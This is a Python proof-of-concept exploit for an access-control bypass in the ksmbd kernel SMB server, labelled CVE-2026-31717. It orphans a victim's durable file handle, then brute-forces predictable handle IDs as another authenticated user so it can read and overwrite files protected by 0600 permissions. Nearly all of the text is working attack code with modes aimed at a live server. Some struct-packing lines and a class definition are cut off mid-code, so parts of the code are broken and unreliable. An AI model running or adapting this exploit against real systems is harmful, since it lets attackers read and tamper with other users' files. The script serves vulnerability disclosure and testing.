#!/usr/bin/env python3 """ CVE-2026-31717 — ksmbd DHnC durable-handle reconnect access-control bypass ========================================================================== smb2_check_durable_oplock() in fs/smb/server/oplock.c falls through the non-lease branch (oplock.c:1852-1864 `goto out`) without verifying the reconnecting user. parse_durable_handle_context() (smb2pdu.c:2796) only looks up by attacker-supplied persistent_id; idr_alloc_cyclic() makes those IDs trivially predictable. Impact: any authenticated SMB user can hijack an orphaned v1 durable handle belonging to another user. Subsequent read/write goes through the original opener's struct file (fp->filp), so kernel_read/write use the victim's f_cred — bypassing POSIX ACLs. Affected dialects: SMB 2.1 (0x0210) and above. v1 (DHnQ/DHnC) is the bruteforceable path; v2 (DH2C) gates by 128-bit CreateGuid. Public reference: https://lore.kernel.org/linux-cve-announce/2026050124-CVE-2026-31717-f68b@gregkh/ Modes: acl-bypass POSIX-0600 ACL-bypass demonstration (headline) victim Phase 1 only — open + orphan (cross-host setup) attack Phase 2 only — bruteforce a PID range (cross-host setup) """ import argparse import socket import struct import sys import time from impacket.smbconnection import SMBConnection from impacket import smb3, smb3structs as s from impacket.nt_errors import STATUS_SUCCESS STATUS_ACCESS_DENIED = 0xC0000022 DIALECT_MAP = { "2.1": s.SMB2_DIALECT_21, "3.0": s.SMB2_DIALECT_30, "3.1.1": s.SMB2_DIALECT_311, } # ── Helpers to build raw create contexts ──────────────────────────── def build_create_context(name, data, is_last=True): """Build a single SMB2_CREATE_CONTEXT blob. name: 4-byte context name (e.g. b"DHnQ") data: context data bytes is_last: if False, sets Next pointer for chaining""" name_offset = 16 # fixed header size = where Name starts name_length = len(name) # Data must be 8-byte aligned after name name_padded_len = (name_length + 7) & ~7 data_offset = name_offset + name_padded_len data_length = len(data) total_size = data_offset + data_length # Next must be 8-byte aligned next_offset = 0 if is_last else ((total_size + 7) & ~7) hdr = struct.pack(" 0: buf += b"\x00" * pad return buf def build_dhnq_context(): """DHnQ - Durable Handle Request v1. Data is 16 bytes of zeros.""" return build_create_context(b"DHnQ", b"\x00" * 16) def build_dhnc_context(persistent_id): """DHnC - Durable Handle Reconnect v1. Data is SMB2_FILEID: PersistentFileId(8) + VolatileFileId(8).""" data = struct.pack("conn becomes NULL and the handle persists in global_ft until the durable scavenger reaps it. """ try: sock = self.conn.getSMBServer().get_socket() except Exception: sock = None if not graceful and sock is not None: try: sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0)) sock.close() print(" [+] TCP RST sent — handle orphaned in ksmbd") self.conn = None return except Exception as e: print(f" [!] RST failed ({e}); falling back to graceful close") try: self.conn.logoff() except Exception: pass try: self.conn.getSMBServer().close_session() except Exception: pass print(" [+] Session graceful logoff (LOGOFF + FIN) — handle orphaned") self.conn = None # ── Exploit phases ────────────────────────────────────────────────── def phase_victim(args, secret=b"1337 stuff\n"): """Phase 1: Victim opens a file with batch oplock + durable handle, writes sensitive data, then disconnects (TCP RST by default).""" print("[*] Phase 1: Victim creates durable handle") print(f" Target: {args.target}:{args.port}") print(f" Share: {args.share}") print(f" User: {args.user}") print(f" File: {args.file}") c = KsmbdClient(args.target, args.port) c.connect_and_auth(args.user, args.password, args.domain, dialect=args.dialect) c.tree_connect(args.share) pid, _, fid = c.create_durable(args.file) written = c.write_file(fid, secret) print(f" [+] Wrote {written} bytes of sensitive data") data = c.read_file(fid, length=len(secret)) print(f" [+] Verified read: {data[:50]}...") print(f"\n [*] Persistent ID to target: {pid}") c.disconnect_orphan(graceful=args.graceful) print(f" [+] Handle {pid} orphaned (persists until durable scavenger timeout).\n") return pid def phase_attack(args, known_pid=None): """Phase 2: Attacker brute-forces persistent IDs to hijack an orphaned v1 durable handle via DHnC.""" print("[*] Phase 2: Attacker hijacks orphaned durable handle") atk_user = getattr(args, "user2", None) or args.user atk_pass = getattr(args, "password2", None) or args.password print(f" Target: {args.target}:{args.port}") print(f" User: {atk_user}") pid_start = getattr(args, "pid_start", 0) pid_end = getattr(args, "pid_end", 64) print(f" Brute-force range: {pid_start}-{pid_end}") c = KsmbdClient(args.target, args.port) c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect) c.tree_connect(args.share) print(f" [*] Scanning persistent IDs for orphaned durable handles...") scan_range = list(range(pid_start, pid_end + 1)) if known_pid is not None: # Try known PID first if known_pid in scan_range: scan_range.remove(known_pid) scan_range.insert(0, known_pid) hijacked = [] for pid in scan_range: try: result = c.create_reconnect_dhnc(pid) except Exception as e: # Connection may reset - reconnect print(f" [*] Error at pid={pid}: {e}, reconnecting...") try: c = KsmbdClient(args.target, args.port) c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect) c.tree_connect(args.share) except Exception: print(f" [!] Reconnect failed, aborting scan") break continue if result is None: if pid % 10 == 0 and pid != known_pid: sys.stdout.write(f"\r [*] Scanned pid={pid}...") sys.stdout.flush() continue _, _, new_fid = result print(f"\n [!!] HIJACKED persistent_id={pid} as '{atk_user}'") try: data = c.read_file(new_fid, length=4096).rstrip(b"\x00").rstrip() print(f" [!!] READ {len(data)} bytes: {data!r}") except Exception as e: print(f" [*] Read attempt: {e}") try: written = c.write_file(new_fid, b"It's my session now :)\n", offset=0) print(f" [!!] WROTE {written} bytes (overwrote victim's content)") except Exception as e: print(f" [*] Write attempt: {e}") hijacked.append(pid) break # Got one if not hijacked: print(f"\n [-] No orphaned durable handles found in range {pid_start}-{pid_end}") else: print(f"\n [+] Successfully hijacked {len(hijacked)} handle(s): {hijacked}") return hijacked def phase_acl_bypass(args): """Headline scenario: prove POSIX 0600 ACL bypass. Step c (control before) and step e (control after) bracket the exploit: if normal CREATE is denied to the attacker both before AND after the hijack, but the attacker can read+write via DHnC reconnect, then f_cred-bypass is the only explanation.""" print("=" * 70) print("CVE-2026-31717 PoC — POSIX ACL bypass via DHnC durable-handle hijack") print("=" * 70) print() atk_user, atk_pass = args.user2, args.password2 rw = s.FILE_READ_DATA | s.FILE_WRITE_DATA def attacker_session(): c = KsmbdClient(args.target, args.port) c.connect_and_auth(atk_user, atk_pass, args.domain, dialect=args.dialect) c.tree_connect(args.share) return c def control_check(c, label): st = c.normal_create_status(args.file, access=rw) if st == STATUS_ACCESS_DENIED: print(f" [+] CONTROL {label}: normal CREATE → STATUS_ACCESS_DENIED ✓") return True print(f" [!] CONTROL {label}: status=0x{st:08X} (expected 0xC0000022)") return False # (a) Victim opens, writes, abrupt-disconnects. pid = phase_victim(args, secret=b"TOP SECRET\n") print("[*] Waiting 3 seconds for ksmbd to mark the handle orphaned...") time.sleep(3) # (b)+(c) Attacker authenticates and proves it can't reach the file normally. print(f"\n[*] Phase 2: Attacker '{atk_user}' attempts ACL bypass") c = attacker_session() if not control_check(c, "pre-exploit"): print(f" Server-side ACL setup is wrong ({atk_user} can already " f"access {args.file}). Aborting demo.") return # (d) Exploit: DHnC reconnect, read+write through victim's f_cred. print(f"\n [*] DHnC reconnect to known pid={pid}") result = c.create_reconnect_dhnc(pid) if result is None: print(f" [-] direct reconnect failed; brute-forcing pid±2") try: c.disconnect_orphan(graceful=True) except Exception: pass args.pid_start, args.pid_end = max(0, pid - 2), pid + 2 if not phase_attack(args, known_pid=pid): print(" [-] No handle hijacked. Was the victim's pid reaped already?") return _, _, new_fid = result print(f" [!!] HIJACKED persistent_id={pid}") data = c.read_file(new_fid, length=4096).rstrip(b"\x00") print(f" [!!] READ as {atk_user}: {data!r} (POSIX 0600 bypassed)") written = c.write_file(new_fid, f"PWNED by {atk_user}\n".encode()) print(f" [!!] WROTE {written} bytes as {atk_user} (POSIX 0600 bypassed)") # (e) Reconnect cleanly and prove the file mode is unchanged. try: c.disconnect_orphan(graceful=True) except Exception: pass print() if control_check(attacker_session(), "post-exploit"): print(f" File POSIX mode unchanged; writes only succeeded because " f"the hijacked fp->filp carried the victim's f_cred.") print(f"\n [+] Server-side verification (run on the ksmbd host):") print(f" stat {args.file} && cat {args.file}") print(f" Expect: 0600 victim:victim, contents = 'PWNED by {atk_user}\\n'") # ── Main ──────────────────────────────────────────────────────────── def main(): parser = argparse.ArgumentParser( description="CVE-2026-31717: ksmbd DHnC durable-handle hijack PoC", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=__doc__ ) sub = parser.add_subparsers(dest="mode", required=True) for name, help_text in [("victim", "Create durable handle as victim"), ("attack", "Hijack orphaned handle as attacker"), ("acl-bypass", "Headline: POSIX 0600 ACL bypass")]: p = sub.add_parser(name, help=help_text) p.add_argument("--target", required=True, help="ksmbd server IP") p.add_argument("--port", type=int, default=445) p.add_argument("--share", required=True, help="Share name") p.add_argument("--user", required=True, help="Username") p.add_argument("--password", required=True, help="Password") p.add_argument("--domain", default="") p.add_argument("--dialect", choices=list(DIALECT_MAP.keys()), default="3.0", help="SMB dialect to negotiate (default: 3.0; 2.1 also works)") p.add_argument("--graceful", action="store_true", help="Use SMB2 LOGOFF + FIN instead of TCP RST when orphaning") if name in ("victim", "acl-bypass"): p.add_argument("--file", default="secret.txt") if name == "attack": p.add_argument("--pid-start", type=int, default=0) p.add_argument("--pid-end", type=int, default=64) if name == "acl-bypass": p.add_argument("--user2", required=True, help="Attacker username") p.add_argument("--password2", required=True, help="Attacker password") args = parser.parse_args() if args.mode == "victim": phase_victim(args) elif args.mode == "attack": phase_attack(args) elif args.mode == "acl-bypass": phase_acl_bypass(args) if __name__ == "__main__": main()